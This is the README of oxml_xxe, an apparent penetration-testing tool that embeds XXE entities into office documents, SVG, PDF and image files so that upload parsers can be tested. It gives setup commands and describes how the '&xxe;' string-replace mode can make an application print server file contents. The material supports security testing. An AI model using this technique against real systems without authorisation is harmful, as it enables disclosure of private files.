Skip to content
A tool for embedding XXE/XML exploits into different filetypes
Branch: master
Clone or download
Latest commit bcc02e9 Oct 31, 2017

README.md

oxml_xxe

This tool is meant to help test XXE vulnerabilities in OXML document file formats. Currently supported:

  • DOCX/XLSX/PPTX
  • ODT/ODG/ODP/ODS
  • SVG
  • XML
  • PDF (experimental)
  • JPG (experimental)
  • GIF (experimental)

BH USA 2015 Presentation:

Exploiting XXE in File Upload Functionality (Slides) (Recorded Webcast)

Blog Posts on the topic:

Exploiting XXE Vulnerabilities in OXML Documents - Part 1

Exploiting CVE-2016-4264 With OXML_XXE

Developer Build

OXML_XXE was re-written in Ruby using Sinatra, Bootstrap, and Haml. Installation should be easy:

  • You will need a copy of Ruby. RVM is suggested (https://rvm.io/rvm/install). ruby version 2.3.5 is supported.

  • If you are running Ubuntu (or also verified on Kali) you will need a couple of dependencies:

apt-get install libsqlite3-dev libxslt-dev libxml2-dev zlib1g-dev gcc

To install RVM:

gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
\curl -sSL https://get.rvm.io | bash

Install Ruby 2.3.5 with RVM

rvm install 2.3.5
rvm use 2.3.5

Install dependencies and start the server:

cd oxml_xxe
gem install bundler
bundle install
ruby server.rb

Browse to http://127.0.0.1:4567 to get started.

Main Modes

There are two main modes:

Build a File

Build mode adds a DOCTYPE and inserts the XML Entity into the file of the users choice.

String Replace in File

String replacement mode goes through and looks for the symbol § in the document. The XML Entity ("&xxe;") replaces any instances of this symbol. Note, you can open the document in and insert § anywhere to have it replaced. The common use case would be a web application which reads in a xlsx and then prints the results to the screen. Exploiting the XXE it would be possible to have the contents printed to the screen.

You can’t perform that action at this time.